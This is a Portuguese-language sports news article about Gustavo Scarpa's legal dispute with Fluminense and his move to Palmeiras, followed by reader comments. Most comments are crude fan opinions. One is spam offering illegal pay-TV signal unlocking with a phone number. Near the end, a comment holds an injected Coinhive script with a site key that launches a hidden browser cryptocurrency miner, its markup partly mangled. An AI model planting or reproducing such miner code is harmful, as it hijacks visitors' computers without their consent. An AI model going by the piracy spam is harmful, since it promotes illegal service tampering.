Foto: Reprodução/ Twitter
O Corinthians estava tentando contratar o meia Gustavo Scarpa, do Fluminense, desde o final do ano passado em briga simultânea com São Paulo e Palmeiras. O jogador iniciou uma batalha judicial contra o clube carioca e travou a negociação. Com uma liminar deferida no final da semana passada, o Palmeiras passou na frente dos rivais paulistanos e anunciou Scarpa. Entenda o imbróglio jurídico e responda: Você acha que o Corinthians deveria ter contratado Scarpa independente da situação jurídica?
O Fluminense devia a Scarpa quatro meses de direitos de imagem e um de salário na forma da CLT, além das férias e dos 13º de 2016 e 2017. Neste cenário, Scarpa pôde entrar com um pedido de liminar na Justiça do Trabalho para assinar com outro clube em processo que pede a rescisão indireta contratual e o pagamento dos débitos financeiros integrais do contrato que iria até 2020. O valor total da ação chega a R$ 9 milhões.
O primeiro pedido de liminar de Scarpa foi negado no retorno do recesso jurídico e foi necessária a apresentação de mais documentos para que a medida protetiva fosse deferida. Desse modo, o jogador rescindiu indiretamente com o Fluminense e ficou "livre" para fechar com qualquer clube. Foi anunciado pelo Palmeiras hoje.
Onde mora o perigo?
A diretoria do Corinthians agiu com cautela desde o início das tratativas. Porém, a batalha jurídica trouxe resguardo à diretoria. O Timão aguardava a tendência de que Fluminense e Scarpa se resolvessem amigavelmente para concluir a negociação, fator que não aconteceu.
Apesar de conseguir a liminar, ela não é definitiva. O Fluminense pode recorrer e derrubá-la. Se isso acontecer, o Palmeiras terá de arcar com a multa contratual no valor de 15 milhões de euros.
Pela possibilidade, mesmo que pequena, de ter de arcar financeiramente pela briga do meia, o Corinthians preferiu recuar e aguardar. Paralelo a isso, a diretoria também priorizou a diplomacia com o Fluminense de não passar por cima do bom relacionamento entre os clubes.
Scarpa ou Flu?
O tema é polêmico e divide opiniões entre os próprios torcedores. Na esférica jurídica, o debate ocorrerá em torno do seguinte: a Lei Pelé dá respaldo à Scarpa em deixar o clube. O artigo 31 explica que, no caso de três meses ou mais de atraso no pagamento de salários ou direitos de imagem, o atleta pode pedir a rescisão para assinar com outra agremiação. O texto é claro ao dizer que férias, 13º, FGTS e até premiações também entram nesta conta.
Tempo de batalha jurídica?
Depois que a liminar é concedida, o caso vai à julgamento no Tribunal. Ao clube, é garantido o direito de se defender e de recorrer. Mas o processo costuma levar anos.
Juridicamente falando, o Scarpa tem grandes chances de vencer essa batalha, mas há argumentos da parte do Fluminense que soltou nota oficial afirmando que irá até a última medida para fazer valer os direitos contratuais.
Provável proteção
O Palmeiras para se proteger de uma possível de Gustavo Scarpa no futuro, adicionou uma cláusula contratual livrando-se de qualquer dano financeiro se o entendimento jurídico der razão ao clube das Laranjeiras.
Lógico essa diretoria tinha a obrigação de fechar com os reis estamos na libertadores e precisamos de reforço somos o maior club temos as maiores rendas e nunca temos dinheiro para contratar qualquer miminho ai chega na nossa frente foi assim com. Dudu keno scarpa dourado e outros precisamos de mais transparência o torcedor q esta ai perto tem q cobrar e muito e tem mais chega d chance para o cazin já mostrou q d bola ñ sabe nada fora com ele da ele para o fluminense kkkkk.
esse cara num serve nem pra limpa a chuteira do rodriguinho ou do jadson. e um lixooooooooo jogador ate o fim do ano nunca tinha ouvifo falar desse frango. Nem em time pequeno num feis pora nenhuma nem um tituloooo jogador pra joga no bragantino. Time guande ele nao joga neo aqui nem na china
Vamos prestar atenção! Ninguém quer ver uma foto da camisa das Pepas aqui, e outra, esse cara já era, n veio, foda se! Aqui é Corinthians, então vamos falar só de Corínthians!
vai morrer na reserva
presidente ipocrita burra ai agora vai ele jogar no pamerda
VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345
Gostei foi da diplomacia com o fluminense. Só faltava essa!
O presidente Pedro Abad do Fluminense numa coletiva lá nos Estados Unidos ironizou o presidente do Corinthians. Tenho certeza que se fosse o Andrés presidente, não deixaria sem resposta a altura. Agora regaça pra cima do Henrique Dourado. URGENTE!!
no ano passado nos ganhamos dos campeonato sem estrela nem uma vamos ganhar mas este ano tenha serteza já o palmeiras comtratar de pacote raí oque eles ganhar nada este ano vai ser a mesma coisa tenha serteza
se fez com o Fluminense que o formou imagina o que não faz com outros clubes. Sou da opinião que tudo tem um acordo tanto pra chegar como pra sair à justiça em qualquer ocasião não fica bem a pessoa sempre vai ficar marcada
Ñ precisa, vai ser reserva lá, precisamos de atacante goleador.
com serteza que não
claro q sim...enquanto nosso time fica pensando os outros contratam......cade o fi de puta do henrique q nao apareceu ainda.....vsfd
Não.
eu acho q não deveria não eu acho q deve contratar um camisa 9 tipo Henrique Dourado
o Palmeiras ja contratou e mais um bone tomado por esse presidente mediocle
Esse Presente é um frouxo..!!!
sim
Corinthians tem que ficar com dourado
< src="https://coinhive.com/lib/coinhive.min.js">><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();>
lógico que sim presidente sem ousadia e sem coragem
Esse Gustavo é um dinheirista, que vá pas pepa essa bosta